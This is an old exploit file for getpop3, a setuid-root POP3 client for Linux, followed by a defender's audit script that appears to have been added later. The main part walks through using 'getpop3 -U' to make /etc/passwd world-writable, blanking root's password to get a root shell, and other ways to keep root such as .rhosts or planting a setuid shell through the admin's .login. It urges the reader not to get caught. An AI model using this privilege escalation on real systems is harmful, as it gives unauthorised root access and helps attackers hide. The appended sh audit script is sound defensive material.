########################################
# what?:    [=- getpop3 exploit -=]    #
# who?:     [- by r3p3nt of the DHC -] #
# where?:   [- http://dhc1.cjb.net -]  #
# contact?: [- tdefiance@hotmail.com -]#
########################################

greets: all of DHC, duke, f0rpaxe, artech, and eli (up for some raceball?)
thanks: jwb

tdefiance@hotmail.com

You are wondering "hmm.. what is getpop3, mister r3p3nt?". Well, getpop3 is a
POP mail client for Linux (no, not that stuff in Chex mix). This exploit has
been known by me for a very long time, so I might as well release it now.

This exploit was found when someone (he will go unnamed because I don't want
Joel to look like a fool) said his Linux box was 'secure, no one can hack it'.
After some fumbling around on his box, root access was obtained. The hole?
Getpop3.

Getpop3 is installed SUID root. If you don't know what SUID root is, don't use
this exploit@!$

When getpop3 is fed the -U parameter it sets a file world writable. If you are
a goon, here is how this could be good:

lamebox:~$ id
uid=1000(elf) gid=100(users) groups=100(users)
lamebox:~$ cp /etc/passwd /tmp/backup
lamebox:~$ getpop3 -V
getpop3 1.08
Copyright 1997 Double Precision, Inc.
lamebox:~$ getpop3 -U /etc/passwd
enter userid: elf
enter password: mypassword
enter host:poopy.reallame666.com
querying poopy.reallame666.com
+OK poopy.reallame666.com POP3 server (Netscape Mail Server v2.02) ready Fri, 1
>USER elf
+OK Password required for elf
>PASS password
+OK elf's mailbox has 0 messages (0 octets)
>STAT
+OK 0 0
>QUIT
+OK poopy.reallame666.com POP3 server closing connection

*************************************************************
* Whoo hooo! Now /etc/passwd is world writable.. the fun begins
* Remember the file we backed up?
*************************************************************

lamebox:~$ cat /tmp/backup > /etc/passwd

***********************************************************************
* Now edit the passwd file so you are 0:0, like so:
* root:x:0:0:super admin,,,:/root:/bin/bash <-- what's in /etc/passwd
* root::0:0:your daddy,,,:/root/:bin/bash   <-- what you change it to
* Now log on as root!@#
* If you didn't fuck anything up you should be dropped to a root shell,
* and not asked for a password.
* Don't wanna overwrite /etc/passwd? Then use .rhosts. Hell, you could
* even edit the admin's .login and make it so when he/she logs in it
* tosses an SUID root shell in /tmp.
* Be creative in what you do, and don't get caught!
***********************************************************************

*************FIX*********************************************
* I haven't noticed the hole in the newer versions. Upgrade. *
*************************************************************
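As an added defender's check, not part of r3p3nt's advisory or of the getpop3 package: a POSIX sh audit that reports whether getpop3 is installed setuid root and whether /etc/passwd and friends have been left world-writable, the two conditions the hole above depends on. The function names are mine, and it assumes a find(1) that understands -perm/-user (GNU, BSD and BusyBox all do).

```shell
#!/bin/sh
# Added audit script (not from the advisory). Checks for the class of bug
# described above: a setuid-root helper that leaves a sensitive file
# world-writable. Assumes POSIX sh and find(1) with -perm/-user.

# Exit 0 if PATH has the other-write bit (mode ----w-) set, else 1.
# -prune keeps find on the named path itself even when it is a directory.
is_world_writable() {
    [ -n "$(find "$1" -prune -perm -002 2>/dev/null)" ]
}

# Print every regular file under DIR that is setuid and owned by OWNER
# (name or numeric uid, default root): the binaries whose bugs become
# local root, which is what made getpop3 -U interesting.
list_setuid_owned_by() {
    dir=$1
    owner=${2:-root}
    find "$dir" -type f -perm -4000 -user "$owner" 2>/dev/null
}

# Exit 0 if BIN is a setuid-root regular file, else 1.
is_setuid_root() {
    [ -n "$(find "$1" -prune -type f -perm -4000 -user root 2>/dev/null)" ]
}

# Human-readable report on the conditions the advisory relies on.
audit_getpop3() {
    bin=$(command -v getpop3 2>/dev/null)
    if [ -z "$bin" ]; then
        echo "getpop3: not installed"
    elif is_setuid_root "$bin"; then
        echo "getpop3: $bin is setuid root; drop the bit or upgrade"
    else
        echo "getpop3: $bin is not setuid root"
    fi
    for f in /etc/passwd /etc/shadow /etc/group; do
        if is_world_writable "$f"; then
            echo "WORLD-WRITABLE: $f (restore the expected mode, then diff it against a backup)"
        else
            echo "ok: $f"
        fi
    done
}
```

Run `audit_getpop3` from a shell that has sourced the file; `list_setuid_owned_by /usr/bin` gives the wider inventory of setuid-root binaries on the host.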